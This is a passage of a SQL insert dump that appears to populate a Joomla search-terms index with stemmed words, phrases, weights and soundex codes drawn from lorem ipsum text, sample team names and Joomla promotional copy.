nec',0,1,1.5667,'B4535252',1,'en'),(84,'condimentum','condimentum',0,0,0.7333,'C53535',1,'en'),(85,'condimentum sit','condimentum sit',0,1,1.5,'C5353523',1,'en'),(86,'condimentum sit amet','condimentum sit amet',0,1,1.6667,'C535352353',1,'en'),(87,'consectetur','consectetur',0,0,0.7333,'C5236',1,'en'),(88,'consectetur ac','consectetur ac',0,1,1.4667,'C52362',1,'en'),(89,'consectetur ac duis','consectetur ac duis',0,1,1.6333,'C5236232',1,'en'),(90,'consectetur adipiscing','consectetur adipiscing',0,1,1.7333,'C523631252',1,'en'),(91,'consectetur adipiscing elit','consectetur adipiscing elit',0,1,1.9,'C52363125243',1,'en'),(92,'convallis','conval',0,0,0.6,'C5142',1,'en'),(93,'convallis adipiscing','conval adipiscing',0,1,1.6667,'C514231252',1,'en'),(94,'convallis adipiscing sed','conval adipiscing sed',0,1,1.8,'C5142312523',1,'en'),(95,'diam','diam',0,0,0.2667,'D500',1,'en'),(96,'diam hendrerit','diam hendrerit',0,1,1.4667,'D5363',1,'en'),(97,'diam hendrerit eget','diam hendrerit eget',0,1,1.6333,'D536323',1,'en'),(98,'dolor','dolor',0,0,0.3333,'D460',1,'en'),(99,'dolor erat','dolor erat',0,1,1.3333,'D463',1,'en'),(100,'dolor erat eget','dolor erat eget',0,1,1.5,'D46323',1,'en'),(101,'dolor quis','dolor quis',0,1,1.3333,'D462',1,'en'),(102,'dolor quis blandit','dolor quis blandit',0,1,1.6,'D4621453',1,'en'),(103,'dolor sit','dolor sit',0,1,1.3,'D4623',1,'en'),(104,'dolor sit amet','dolor sit amet',0,1,1.4667,'D462353',1,'en'),(105,'donec','donec',0,0,0.3333,'D520',1,'en'),(106,'donec condimentum','donec condimentum',0,1,1.5667,'D5253535',1,'en'),(107,'donec condimentum sit','donec condimentum sit',0,1,1.7,'D525353523',1,'en'),(108,'donec nec','donec nec',0,1,1.3,'D5252',1,'en'),(109,'donec nec sollicitudin','donec nec sollicitudin',0,1,1.7333,'D52524235',1,'en'),(110,'duis','dui',0,0,0.2667,'D200',1,'en'),(111,'duis iaculis','dui iaculis',0,1,1.4,'D242',1,'en'),(112,'duis iaculis sed','dui iaculis sed',0,1,1.5333,'D2423',1,'en'),(113,'eget','eget',0,0,0.2667,'E230',1,'en'),(114,'eget posuere','eget posuere',0,1,1.4,'E23126',1,'en'),(115,'eget posuere nisi','eget posuere nisi',0,1,1.5667,'E2312652',1,'en'),(116,'eget rutrum','eget rutrum',0,1,1.3667,'E236365',1,'en'),(117,'eget rutrum mauris','eget rutrum mauris',0,1,1.6,'E23636562',1,'en'),(118,'elit','elit',0,0,0.2667,'E430',1,'en'),(119,'elit at','elit at',0,1,1.2333,'E430',1,'en'),(120,'elit at tincidunt','elit at tincidunt',0,1,1.5667,'E4352353',1,'en'),(121,'elit fusce','elit fusce',0,1,1.3333,'E4312',1,'en'),(122,'elit fusce at','elit fusce at',0,1,1.4333,'E43123',1,'en'),(123,'elit sit','elit sit',0,1,1.2667,'E4323',1,'en'),(124,'elit sit amet','elit sit amet',0,1,1.4333,'E432353',1,'en'),(125,'enim','enim',0,0,0.2667,'E500',1,'en'),(126,'enim nec','enim nec',0,1,1.2667,'E520',1,'en'),(127,'enim nec tempor','enim nec tempor',0,1,1.5,'E523516',1,'en'),(128,'enim sollicitudin','enim sollicitudin',0,1,1.5667,'E524235',1,'en'),(129,'enim sollicitudin tempus','enim sollicitudin tempus',0,1,1.8,'E5242353512',1,'en'),(130,'erat','erat',0,0,0.2667,'E630',1,'en'),(131,'erat eget','erat eget',0,1,1.3,'E6323',1,'en'),(132,'erat eget posuere','erat eget posuere',0,1,1.5667,'E6323126',1,'en'),(133,'eros','ero',0,0,0.2667,'E620',1,'en'),(134,'eros semper','ero semper',0,1,1.3667,'E62516',1,'en'),(135,'eros semper velit','ero semper velit',0,1,1.5667,'E62516143',1,'en'),(136,'est','est',0,0,0.2,'E230',2,'en'),(137,'est nulla','est nulla',0,1,1.3,'E2354',1,'en'),(138,'est nulla porttitor','est nulla porttitor',0,1,1.6333,'E23541636',1,'en'),(139,'et','et',0,0,0.1333,'E300',3,'en'),(140,'et rhoncus','et rhoncus',0,1,1.3333,'E3652',1,'en'),(141,'et rhoncus metus','et rhoncus metus',0,1,1.5333,'E3652532',1,'en'),(142,'etiam','etiam',0,0,0.3333,'E350',1,'en'),(143,'etiam ut','etiam ut',0,1,1.2667,'E353',1,'en'),(144,'etiam ut varius','etiam ut varius',0,1,1.5,'E353162',1,'en'),(145,'faucibus','faucibu',0,0,0.5333,'F212',1,'en'),(146,'faucibus magna','faucibu magna',0,1,1.4667,'F212525',1,'en'),(147,'faucibus magna etiam','faucibu magna etiam',0,1,1.6667,'F21252535',1,'en'),(148,'felis','feli',0,0,0.3333,'F420',1,'en'),(149,'felis eros','feli eros',0,1,1.3333,'F4262',1,'en'),(150,'felis eros semper','feli eros semper',0,1,1.5667,'F4262516',1,'en'),(151,'fusce','fusc',0,0,0.3333,'F200',1,'en'),(152,'fusce at','fusc at',0,1,1.2667,'F230',1,'en'),(153,'fusce at purus','fusc at purus',0,1,1.4667,'F23162',1,'en'),(154,'hendrerit','hendrerit',0,0,0.6,'H5363',1,'en'),(155,'hendrerit eget','hendrerit eget',0,1,1.4667,'H536323',1,'en'),(156,'hendrerit eget rutrum','hendrerit eget rutrum',0,1,1.7,'H5363236365',1,'en'),(157,'iaculis','iaculi',0,0,0.4667,'I242',1,'en'),(158,'iaculis ornare','iaculi ornare',0,1,1.4667,'I242656',1,'en'),(159,'iaculis ornare enim','iaculi ornare enim',0,1,1.6333,'I2426565',1,'en'),(160,'iaculis sed','iaculi sed',0,1,1.3667,'I2423',1,'en'),(161,'iaculis sed elit','iaculi sed elit',0,1,1.5333,'I242343',1,'en'),(162,'id','id',0,0,0.1333,'I300',1,'en'),(163,'id pharetra','id pharetra',0,1,1.3667,'I31636',1,'en'),(164,'id pharetra lacinia','id pharetra lacinia',0,1,1.6333,'I31636425',1,'en'),(165,'imperdiet','imperdiet',0,0,0.6,'I5163',1,'en'),(166,'imperdiet elit','imperdiet elit',0,1,1.4667,'I516343',1,'en'),(167,'imperdiet elit sit','imperdiet elit sit',0,1,1.6,'I51634323',1,'en'),(168,'ipsum','ipsum',0,0,0.3333,'I125',1,'en'),(169,'ipsum dolor','ipsum dolor',0,1,1.3667,'I125346',1,'en'),(170,'ipsum dolor sit','ipsum dolor sit',0,1,1.5,'I12534623',1,'en'),(171,'lacinia','lacinia',0,0,0.4667,'L250',1,'en'),(172,'lacinia dolor','lacinia dolor',0,1,1.4333,'L25346',1,'en'),(173,'lacinia dolor erat','lacinia dolor erat',0,1,1.6,'L253463',1,'en'),(174,'lacinia felis','lacinia felis',0,1,1.4333,'L25142',1,'en'),(175,'lacinia felis eros','lacinia felis eros',0,1,1.6,'L2514262',1,'en'),(176,'lectus','lectu',0,0,0.4,'L232',1,'en'),(177,'lectus donec','lectu donec',0,1,1.4,'L232352',1,'en'),(178,'lectus donec condimentum','lectu donec condimentum',0,1,1.8,'L23235253535',1,'en'),(179,'lectus ut','lectu ut',0,1,1.3,'L2323',1,'en'),(180,'lectus ut lacinia','lectu ut lacinia',0,1,1.5667,'L2323425',1,'en'),(181,'lorem','lorem',0,0,0.3333,'L650',1,'en'),(182,'lorem ipsum','lorem ipsum',0,1,1.3667,'L65125',1,'en'),(183,'lorem ipsum dolor','lorem ipsum dolor',0,1,1.5667,'L65125346',1,'en'),(184,'magna','magna',0,0,0.3333,'M250',1,'en'),(185,'magna etiam','magna etiam',0,1,1.3667,'M2535',1,'en'),(186,'magna etiam ut','magna etiam ut',0,1,1.4667,'M25353',1,'en'),(187,'massa','massa',0,0,0.3333,'M200',1,'en'),(188,'massa convallis','massa convallis',0,1,1.5,'M25142',1,'en'),(189,'massa convallis adipiscing','massa convallis adipiscing',0,1,1.8667,'M2514231252',1,'en'),(190,'mauris','mauri',0,0,0.4,'M620',1,'en'),(191,'mauris volutpat','mauri volutpat',0,1,1.5,'M6214313',1,'en'),(192,'mauris volutpat quisque','mauri volutpat quisque',0,1,1.7667,'M62143132',1,'en'),(193,'meet','meet',0,0,0.2667,'M300',2,'en'),(194,'meet the','meet the',0,1,1.2667,'M300',1,'en'),(195,'meet the team','meet the team',0,1,1.4333,'M350',1,'en'),(196,'metus','metu',0,0,0.3333,'M320',1,'en'),(197,'metus elit','metu elit',0,1,1.3333,'M3243',1,'en'),(198,'metus elit sit','metu elit sit',0,1,1.4667,'M324323',1,'en'),(199,'nec','nec',0,0,0.2,'N200',1,'en'),(200,'nec sollicitudin','nec sollicitudin',0,1,1.5333,'N24235',1,'en'),(201,'nec sollicitudin purus','nec sollicitudin purus',0,1,1.7333,'N24235162',1,'en'),(202,'nec tempor','nec tempor',0,1,1.3333,'N23516',1,'en'),(203,'nec tempor aenean','nec tempor aenean',0,1,1.5667,'N235165',1,'en'),(204,'nisi','nisi',0,0,0.2667,'N200',1,'en'),(205,'nisi consectetur','nisi consectetur',0,1,1.5333,'N25236',1,'en'),(206,'nisi consectetur ac','nisi consectetur ac',0,1,1.6333,'N252362',1,'en'),(207,'nulla','nulla',0,0,0.3333,'N400',1,'en'),(208,'nulla porttitor','nulla porttitor',0,1,1.5,'N41636',1,'en'),(209,'nulla porttitor placerat','nulla porttitor placerat',0,1,1.8,'N4163614263',1,'en'),(210,'nunc','nunc',0,0,0.2667,'N200',1,'en'),(211,'nunc at','nunc at',0,1,1.2333,'N230',1,'en'),(212,'nunc at varius','nunc at varius',0,1,1.4667,'N23162',1,'en'),(213,'ornare','ornar',0,0,0.4,'O656',1,'en'),(214,'ornare enim','ornar enim',0,1,1.3667,'O6565',1,'en'),(215,'ornare enim nec','ornar enim nec',0,1,1.5,'O65652',1,'en'),(216,'pharetra','pharetra',0,0,0.5333,'P636',1,'en'),(217,'pharetra lacinia','pharetra lacinia',0,1,1.5333,'P636425',1,'en'),(218,'pharetra lacinia felis','pharetra lacinia felis',0,1,1.7333,'P636425142',1,'en'),(219,'pharetra lectus','pharetra lectus',0,1,1.5,'P6364232',1,'en'),(220,'pharetra lectus ut','pharetra lectus ut',0,1,1.6,'P63642323',1,'en'),(221,'placerat','placerat',0,0,0.5333,'P4263',1,'en'),(222,'placerat dolor','placerat dolor',0,1,1.4667,'P426346',1,'en'),(223,'placerat dolor quis','placerat dolor quis',0,1,1.6333,'P4263462',1,'en'),(224,'porttitor','porttitor',0,0,0.6,'P636',1,'en'),(225,'porttitor placerat','porttitor placerat',0,1,1.6,'P63614263',1,'en'),(226,'porttitor placerat dolor','porttitor placerat dolor',0,1,1.8,'P6361426346',1,'en'),(227,'posuere','posuer',0,0,0.4667,'P260',1,'en'),(228,'posuere nisi','posuer nisi',0,1,1.4,'P2652',1,'en'),(229,'posuere nisi consectetur','posuer nisi consectetur',0,1,1.8,'P26525236',1,'en'),(230,'praesent','praesent',0,0,0.5333,'P6253',1,'en'),(231,'praesent iaculis','praesent iaculis',0,1,1.5333,'P6253242',1,'en'),(232,'praesent iaculis ornare','praesent iaculis ornare',0,1,1.7667,'P6253242656',1,'en'),(233,'purus','puru',0,0,0.3333,'P620',1,'en'),(234,'purus ac','puru ac',0,1,1.2667,'P620',1,'en'),(235,'purus ac faucibus','puru ac faucibus',0,1,1.5667,'P621212',1,'en'),(236,'purus quis','puru quis',0,1,1.3333,'P620',1,'en'),(237,'purus quis enim','puru quis enim',0,1,1.5,'P625',1,'en'),(238,'quis','qui',0,0,0.2667,'Q000',1,'en'),(239,'quis blandit','qui blandit',0,1,1.4,'Q1453',1,'en'),(240,'quis blandit donec','qui blandit donec',0,1,1.6,'Q145352',1,'en'),(241,'quis enim','qui enim',0,1,1.3,'Q500',1,'en'),(242,'quis enim sollicitudin','qui enim sollicitudin',0,1,1.7333,'Q524235',1,'en'),(243,'quisque','quisqu',0,0,0.4667,'Q000',1,'en'),(244,'quisque semper','quisqu semper',0,1,1.4667,'Q516',1,'en'),(245,'quisque semper tortor','quisqu semper tortor',0,1,1.7,'Q5163636',1,'en'),(246,'rhoncus','rhoncu',0,0,0.4667,'R520',1,'en'),(247,'rhoncus metus','rhoncu metus',0,1,1.4333,'R52532',1,'en'),(248,'rhoncus metus elit','rhoncu metus elit',0,1,1.6,'R5253243',1,'en'),(249,'rutrum','rutrum',0,0,0.4,'R365',1,'en'),(250,'rutrum mauris','rutrum mauris',0,1,1.4333,'R36562',1,'en'),(251,'rutrum mauris volutpat','rutrum mauris volutpat',0,1,1.7333,'R3656214313',1,'en'),(252,'scelerisque','scelerisqu',0,0,0.7333,'S462',1,'en'),(253,'scelerisque tellus','scelerisqu tellus',0,1,1.6,'S462342',1,'en'),(254,'scelerisque tellus id','scelerisqu tellus id',0,1,1.7,'S4623423',1,'en'),(255,'sed','sed',0,0,0.2,'S300',1,'en'),(256,'sed auctor','sed auctor',0,1,1.3333,'S3236',1,'en'),(257,'sed auctor aliquet','sed auctor aliquet',0,1,1.6,'S3236423',1,'en'),(258,'sed elit','sed elit',0,1,1.2667,'S343',1,'en'),(259,'sed elit at','sed elit at',0,1,1.3667,'S343',1,'en'),(260,'sed scelerisque','sed scelerisque',0,1,1.5,'S32462',1,'en'),(261,'sed scelerisque tellus','sed scelerisque tellus',0,1,1.7333,'S32462342',1,'en'),(262,'sed ut','sed ut',0,1,1.2,'S300',1,'en'),(263,'sed ut pharetra','sed ut pharetra',0,1,1.5,'S31636',1,'en'),(264,'semper','semper',0,0,0.4,'S516',1,'en'),(265,'semper tortor','semper tortor',0,1,1.4333,'S5163636',1,'en'),(266,'semper tortor sed','semper tortor sed',0,1,1.5667,'S516363623',1,'en'),(267,'semper velit','semper velit',0,1,1.4,'S516143',1,'en'),(268,'semper velit et','semper velit et',0,1,1.5,'S516143',1,'en'),(269,'sit','sit',0,0,0.2,'S300',1,'en'),(270,'sit amet','sit amet',0,1,1.2667,'S353',1,'en'),(271,'sit amet consectetur','sit amet consectetur',0,1,1.6667,'S35325236',1,'en'),(272,'sit amet diam','sit amet diam',0,1,1.4333,'S3535',1,'en'),(273,'sit amet lectus','sit amet lectus',0,1,1.5,'S3534232',1,'en'),(274,'sit amet massa','sit amet massa',0,1,1.4667,'S35352',1,'en'),(275,'sit amet tempus','sit amet tempus',0,1,1.5,'S353512',1,'en'),(276,'sollicitudin','sollicitudin',0,0,0.8,'S4235',1,'en'),(277,'sollicitudin purus','sollicitudin purus',0,1,1.6,'S4235162',1,'en'),(278,'sollicitudin purus ac','sollicitudin purus ac',0,1,1.7,'S4235162',1,'en'),(279,'sollicitudin tempus','sollicitudin tempus',0,1,1.6333,'S42353512',1,'en'),(280,'sollicitudin tempus aliquam','sollicitudin tempus aliquam',0,1,1.9,'S42353512425',1,'en'),(281,'super','super',0,0,0.3333,'S160',41,'en'),(282,'super user','super user',0,1,1.3333,'S1626',41,'en'),(283,'team','team',0,0,0.2667,'T500',4,'en'),(284,'tellus','tellu',0,0,0.4,'T420',1,'en'),(285,'tellus id','tellu id',0,1,1.3,'T423',1,'en'),(286,'tellus id pharetra','tellu id pharetra',0,1,1.6,'T4231636',1,'en'),(287,'tempor','tempor',0,0,0.4,'T516',1,'en'),(288,'tempor aenean','tempor aenean',0,1,1.4333,'T5165',1,'en'),(289,'tempor aenean sit','tempor aenean sit',0,1,1.5667,'T516523',1,'en'),(290,'tempus','tempu',0,0,0.4,'T512',1,'en'),(291,'tempus aliquam','tempu aliquam',0,1,1.4667,'T512425',1,'en'),(292,'tempus aliquam imperdiet','tempu aliquam imperdiet',0,1,1.8,'T512425163',1,'en'),(293,'tempus nunc','tempu nunc',0,1,1.3667,'T51252',1,'en'),(294,'tempus nunc at','tempu nunc at',0,1,1.4667,'T512523',1,'en'),(295,'the','the',1,0,0.025,'T000',28,'en'),(296,'the team','the team',0,1,1.2667,'T500',2,'en'),(297,'tincidunt','tincidunt',0,0,0.6,'T52353',1,'en'),(298,'tincidunt praesent','tincidunt praesent',0,1,1.6,'T5235316253',1,'en'),(299,'tincidunt praesent iaculis','tincidunt praesent iaculis',0,1,1.8667,'T5235316253242',1,'en'),(300,'tortor','tortor',0,0,0.4,'T636',1,'en'),(301,'tortor sed','tortor sed',0,1,1.3333,'T63623',1,'en'),(302,'tortor sed auctor','tortor sed auctor',0,1,1.5667,'T63623236',1,'en'),(303,'user','user',1,0,0.0333,'U260',41,'en'),(304,'ut','ut',0,0,0.1333,'U300',1,'en'),(305,'ut lacinia','ut lacinia',0,1,1.3333,'U3425',1,'en'),(306,'ut lacinia dolor','ut lacinia dolor',0,1,1.5333,'U3425346',1,'en'),(307,'ut pharetra','ut pharetra',0,1,1.3667,'U31636',1,'en'),(308,'ut pharetra lectus','ut pharetra lectus',0,1,1.6,'U316364232',1,'en'),(309,'ut varius','ut varius',0,1,1.3,'U3162',1,'en'),(310,'ut varius purus','ut varius purus',0,1,1.5,'U3162162',1,'en'),(311,'varius','variu',0,0,0.4,'V620',1,'en'),(312,'varius est','variu est',0,1,1.3333,'V623',1,'en'),(313,'varius est nulla','variu est nulla',0,1,1.5333,'V62354',1,'en'),(314,'varius purus','variu purus',0,1,1.4,'V62162',1,'en'),(315,'velit','velit',0,0,0.3333,'V430',1,'en'),(316,'velit et','velit et',0,1,1.2667,'V430',1,'en'),(317,'velit et rhoncus','velit et rhoncus',0,1,1.5333,'V43652',1,'en'),(318,'volutpat','volutpat',0,0,0.5333,'V4313',1,'en'),(319,'volutpat quisque','volutpat quisque',0,1,1.5333,'V43132',1,'en'),(320,'volutpat quisque semper','volutpat quisque semper',0,1,1.7667,'V43132516',1,'en'),(374,'112','112',0,0,0.3,'',1,'en'),(375,'a','a',1,0,0.0083,'A000',30,'en'),(376,'a edinson','a edinson',0,1,1.3,'A3525',1,'en'),(377,'a edinson cavani','a edinson cavani',0,1,1.5333,'A3525215',1,'en'),(378,'cavani','cavani',0,0,0.4,'C150',1,'en'),(379,'cavani graphic','cavani graphic',0,1,1.4667,'C152612',1,'en'),(380,'cavani graphic designer','cavani graphic designer',0,1,1.7667,'C1526123256',1,'en'),(381,'cto','cto',0,0,0.2,'C300',1,'en'),(382,'cto zlatan','cto zlatan',0,1,1.3333,'C32435',1,'en'),(383,'cto zlatan ibrahimović','cto zlatan ibrahimović',0,1,1.7333,'C324351651',1,'en'),(384,'data-articles','data-articl',0,0,0.8667,'D63242',16,'en'),(385,'designer','design',0,0,0.5333,'D256',4,'en'),(386,'designer radamel','design radamel',0,1,1.5333,'D256354',1,'en'),(387,'designer radamel falcao','design radamel falcao',0,1,1.7667,'D256354142',1,'en'),(388,'developer','develop',0,0,0.6,'D1416',1,'en'),(389,'edinson','edinson',0,0,0.4667,'E3525',1,'en'),(390,'edinson cavani','edinson cavani',0,1,1.4667,'E3525215',1,'en'),(391,'edinson cavani graphic','edinson cavani graphic',0,1,1.7333,'E35252152612',1,'en'),(392,'end','end',0,0,0.2,'E530',3,'en'),(393,'end engineer','end engineer',0,1,1.4,'E535256',1,'en'),(394,'end engineer a','end engineer a',0,1,1.4667,'E535256',1,'en'),(395,'engineer','engin',0,0,0.5333,'E5256',1,'en'),(396,'engineer a','engin a',0,1,1.3333,'E5256',1,'en'),(397,'engineer a edinson','engin a edinson',0,1,1.6,'E52563525',1,'en'),(398,'falcao','falcao',0,0,0.4,'F420',1,'en'),(399,'falcao intern','falcao intern',0,1,1.4333,'F425365',1,'en'),(400,'falcao intern developer','falcao intern developer',0,1,1.7667,'F42536531416',1,'en'),(401,'front','front',0,0,0.3333,'F653',1,'en'),(402,'front end','front end',0,1,1.3,'F65353',1,'en'),(403,'front end engineer','front end engineer',0,1,1.6,'F653535256',1,'en'),(404,'graphic','graphic',0,0,0.4667,'G612',1,'en'),(405,'graphic designer','graphic designer',0,1,1.5333,'G6123256',1,'en'),(406,'graphic designer radamel','graphic designer radamel',0,1,1.8,'G6123256354',1,'en'),(407,'ibrahimović','ibrahimović',0,0,0.7333,'I1651',1,'en'),(408,'ibrahimović front','ibrahimović front',0,1,1.5667,'I1651653',1,'en'),(409,'ibrahimović front end','ibrahimović front end',0,1,1.7,'I165165353',1,'en'),(410,'intern','intern',0,0,0.4,'I5365',1,'en'),(411,'intern developer','intern developer',0,1,1.5333,'I536531416',1,'en'),(412,'partners','partner',0,0,0.5333,'P63562',3,'en'),(413,'radamel','radamel',0,0,0.4667,'R354',1,'en'),(414,'radamel falcao','radamel falcao',0,1,1.4667,'R354142',1,'en'),(415,'radamel falcao intern','radamel falcao intern',0,1,1.7,'R3541425365',1,'en'),(416,'rooney','roonei',0,0,0.4,'R500',1,'en'),(417,'rooney cto','roonei cto',0,1,1.3333,'R523',1,'en'),(418,'rooney cto zlatan','roonei cto zlatan',0,1,1.5667,'R5232435',1,'en'),(419,'sample','sampl',0,0,0.4,'S514',17,'en'),(420,'sample data-articles','sampl data-articles',0,1,1.6667,'S514363242',16,'en'),(421,'wayne','wayn',0,0,0.3333,'W500',1,'en'),(422,'wayne rooney','wayn rooney',0,1,1.4,'W565',1,'en'),(423,'wayne rooney cto','wayn rooney cto',0,1,1.5333,'W56523',1,'en'),(424,'zlatan','zlatan',0,0,0.4,'Z435',1,'en'),(425,'zlatan ibrahimović','zlatan ibrahimović',0,1,1.6,'Z4351651',1,'en'),(426,'zlatan ibrahimović front','zlatan ibrahimović front',0,1,1.8,'Z4351651653',1,'en'),(432,'part','part',0,0,0.2667,'P630',7,'en'),(433,'24','24',0,0,0.2,'',2,'en'),(434,'a flexible','a flexible',0,1,1.3333,'A14214',1,'en'),(435,'a flexible and','a flexible and',0,1,1.4667,'A1421453',1,'en'),(436,'a huge','a huge',0,1,1.2,'A200',1,'en'),(437,'a huge site','a huge site',0,1,1.3667,'A230',1,'en'),(438,'a joomla','a joomla',0,1,1.2667,'A254',1,'en'),(439,'a joomla site','a joomla site',0,1,1.4333,'A25423',1,'en'),(440,'a small','a small',0,1,1.2333,'A254',1,'en'),(441,'a small site','a small site',0,1,1.4,'A25423',1,'en'),(442,'a website','a website',0,1,1.3,'A123',1,'en'),(443,'a website just','a website just',0,1,1.4667,'A12323',1,'en'),(444,'and','and',1,0,0.025,'A530',28,'en'),(445,'and keep','and keep',0,1,1.2667,'A5321',1,'en'),(446,'and keep it','and keep it',0,1,1.3667,'A53213',1,'en'),(447,'and maintain','and maintain',0,1,1.4,'A53535',1,'en'),(448,'and maintain joomla','and maintain joomla',0,1,1.6333,'A53535254',1,'en'),(449,'and powerful','and powerful',0,1,1.4,'A531614',1,'en'),(450,'and powerful platform','and powerful platform',0,1,1.7,'A531614143165',1,'en'),(451,'are','ar',1,0,0.025,'A600',15,'en'),(452,'are building','ar building',0,1,1.4,'A614352',1,'en'),(453,'are building a','ar building a',0,1,1.4667,'A614352',1,'en'),(454,'build','build',0,0,0.3333,'B430',2,'en'),(455,'build a','build a',0,1,1.2333,'B430',2,'en'),(456,'build a website','build a website',0,1,1.5,'B43123',1,'en'),(457,'building','build',0,0,0.5333,'B4352',1,'en'),(458,'building a','build a',0,1,1.3333,'B4352',1,'en'),(459,'building a small','build a small',0,1,1.5333,'B435254',1,'en'),(460,'can','can',0,0,0.2,'C500',12,'en'),(461,'can make','can make',0,1,1.2667,'C520',1,'en'),(462,'can make it','can make it',0,1,1.3667,'C523',1,'en'),(463,'congratulations','congratul',0,0,1,'C52634352',1,'en'),(464,'congratulations you','congratul you',0,1,1.6333,'C52634352',1,'en'),(465,'congratulations you have','congratul you have',0,1,1.8,'C526343521',1,'en'),(466,'easy','easi',0,0,0.2667,'E200',6,'en'),(467,'easy to','easi to',0,1,1.2333,'E230',2,'en'),(468,'easy to build','easi to build',0,1,1.4333,'E23143',1,'en'),(469,'flexible','flexibl',0,0,0.5333,'F4214',1,'en'),(470,'flexible and','flexibl and',0,1,1.4,'F421453',1,'en'),(471,'flexible and powerful','flexibl and powerful',0,1,1.7,'F4214531614',1,'en'),(472,'for','for',1,0,0.025,'F600',24,'en'),(473,'for yourself','for yourself',0,1,1.4,'F6241',1,'en'),(474,'for yourself or','for yourself or',0,1,1.5,'F62416',1,'en'),(475,'have','have',0,0,0.2667,'H100',15,'en'),(476,'have a','have a',0,1,1.2,'H100',7,'en'),(477,'have a joomla','have a joomla',0,1,1.4333,'H1254',1,'en'),(478,'huge','huge',0,0,0.2667,'H200',1,'en'),(479,'huge site','huge site',0,1,1.3,'H230',1,'en'),(480,'huge site with','huge site with',0,1,1.4667,'H230',1,'en'),(481,'hundreds','hundr',0,0,0.5333,'H53632',1,'en'),(482,'hundreds of','hundr of',0,1,1.3667,'H536321',1,'en'),(483,'hundreds of thousands','hundr of thousands',0,1,1.7,'H53632132532',1,'en'),(484,'is','is',1,0,0.0167,'I200',22,'en'),(485,'is a','is a',0,1,1.1333,'I200',10,'en'),(486,'is a flexible','is a flexible',0,1,1.4333,'I214214',1,'en'),(487,'is open','is open',0,1,1.2333,'I215',1,'en'),(488,'is open source','is open source',0,1,1.4667,'I215262',1,'en'),(489,'it','it',1,0,0.0167,'I300',20,'en'),(490,'it and','it and',0,1,1.2,'I353',3,'en'),(491,'it and keep','it and keep',0,1,1.3667,'I35321',1,'en'),(492,'it simple','it simple',0,1,1.3,'I32514',1,'en'),(493,'it simple to','it simple to',0,1,1.4,'I325143',1,'en'),(494,'it to','it to',0,1,1.1667,'I300',3,'en'),(495,'it work','it work',0,1,1.2333,'I362',1,'en'),(496,'it work just','it work just',0,1,1.4,'I3623',1,'en'),(497,'joomla','joomla',0,0,0.4,'J540',2,'en'),(498,'joomla is','joomla is',0,1,1.3,'J542',1,'en'),(499,'joomla is a','joomla is a',0,1,1.3667,'J542',1,'en'),(500,'joomla is open','joomla is open',0,1,1.4667,'J54215',1,'en'),(501,'joomla makes','joomla makes',0,1,1.4,'J5452',1,'en'),(502,'joomla makes your','joomla makes your',0,1,1.5667,'J54526',1,'en'),(503,'joomla site','joomla site',0,1,1.3667,'J5423',1,'en'),(504,'joomla site joomla','joomla site joomla',0,1,1.6,'J5423254',1,'en'),(505,'just','just',0,0,0.2667,'J300',11,'en'),(506,'just the','just the',0,1,1.2667,'J300',1,'en'),(507,'just the way','just the way',0,1,1.4,'J300',1,'en'),(508,'keep','keep',0,0,0.2667,'K100',1,'en'),(509,'keep it','keep it',0,1,1.2333,'K130',1,'en'),(510,'keep it simple','keep it simple',0,1,1.4667,'K132514',1,'en'),(511,'maintain','maintain',0,0,0.5333,'M350',1,'en'),(512,'maintain joomla','maintain joomla',0,1,1.5,'M35254',1,'en'),(513,'maintain joomla is','maintain joomla is',0,1,1.6,'M352542',1,'en'),(514,'make','make',0,0,0.2667,'M200',8,'en'),(515,'make it','make it',0,1,1.2333,'M230',1,'en'),(516,'make it work','make it work',0,1,1.4,'M2362',1,'en'),(517,'makes','make',0,0,0.3333,'M200',6,'en'),(518,'makes your','make your',0,1,1.3333,'M260',1,'en'),(519,'makes your site','make your site',0,1,1.5,'M2623',1,'en'),(520,'means','mean',0,0,0.3333,'M200',4,'en'),(521,'means you','mean you',0,1,1.3,'M200',1,'en'),(522,'means you can','mean you can',0,1,1.4333,'M250',1,'en'),(523,'of','of',1,0,0.0167,'O100',29,'en'),(524,'of thousands','of thousands',0,1,1.4,'O132532',1,'en'),(525,'of thousands of','of thousands of',0,1,1.5,'O1325321',1,'en'),(526,'of visitors','of visitors',0,1,1.3667,'O12362',1,'en'),(527,'of visitors joomla','of visitors joomla',0,1,1.6,'O1236254',1,'en'),(528,'open','open',0,0,0.2667,'O150',3,'en'),(529,'open source','open source',0,1,1.3667,'O15262',1,'en'),(530,'open source which','open source which',0,1,1.5667,'O15262',1,'en'),(531,'or','or',1,0,0.0167,'O600',14,'en'),(532,'or a','or a',0,1,1.1333,'O600',1,'en'),(533,'or a huge','or a huge',0,1,1.3,'O620',1,'en'),(534,'platform','platform',0,0,0.5333,'P43165',2,'en'),(535,'platform whether','platform whether',0,1,1.5333,'P4316536',1,'en'),(536,'platform whether you','platform whether you',0,1,1.6667,'P4316536',1,'en'),(537,'powerful','power',0,0,0.5333,'P614',1,'en'),(538,'powerful platform','power platform',0,1,1.5667,'P614143165',1,'en'),(539,'powerful platform whether','power platform whether',0,1,1.8333,'P61414316536',1,'en'),(540,'simple','simpl',0,0,0.4,'S514',1,'en'),(541,'simple to','simpl to',0,1,1.3,'S5143',1,'en'),(542,'simple to update','simpl to update',0,1,1.5333,'S514313',1,'en'),(543,'site','site',0,0,0.2667,'S300',3,'en'),(544,'site easy','site easy',0,1,1.3,'S320',1,'en'),(545,'site easy to','site easy to',0,1,1.4,'S323',1,'en'),(546,'site for','site for',0,1,1.2667,'S316',1,'en'),(547,'site for yourself','site for yourself',0,1,1.5667,'S316241',1,'en'),(548,'site joomla','site joomla',0,1,1.3667,'S3254',1,'en'),(549,'site joomla makes','site joomla makes',0,1,1.5667,'S325452',1,'en'),(550,'site with','site with',0,1,1.3,'S300',1,'en'),(551,'site with hundreds','site with hundreds',0,1,1.6,'S353632',1,'en'),(552,'small','small',1,0,0.0417,'S540',3,'en'),(553,'small site','small site',0,1,1.3333,'S5423',1,'en'),(554,'small site for','small site for',0,1,1.4667,'S542316',1,'en'),(555,'source','sourc',0,0,0.4,'S620',3,'en'),(556,'source which','sourc which',0,1,1.4,'S620',1,'en'),(557,'source which means','sourc which means',0,1,1.6,'S6252',1,'en'),(558,'the way','the way',0,1,1.2333,'T000',3,'en'),(559,'the way you','the way you',0,1,1.3667,'T000',1,'en'),(560,'thousands','thousand',0,0,0.6,'T2532',2,'en'),(561,'thousands of','thousand of',0,1,1.4,'T25321',2,'en'),(562,'thousands of visitors','thousand of visitors',0,1,1.7,'T253212362',1,'en'),(563,'to','to',1,0,0.0167,'T000',24,'en'),(564,'to build','to build',0,1,1.2667,'T143',2,'en'),(565,'to build 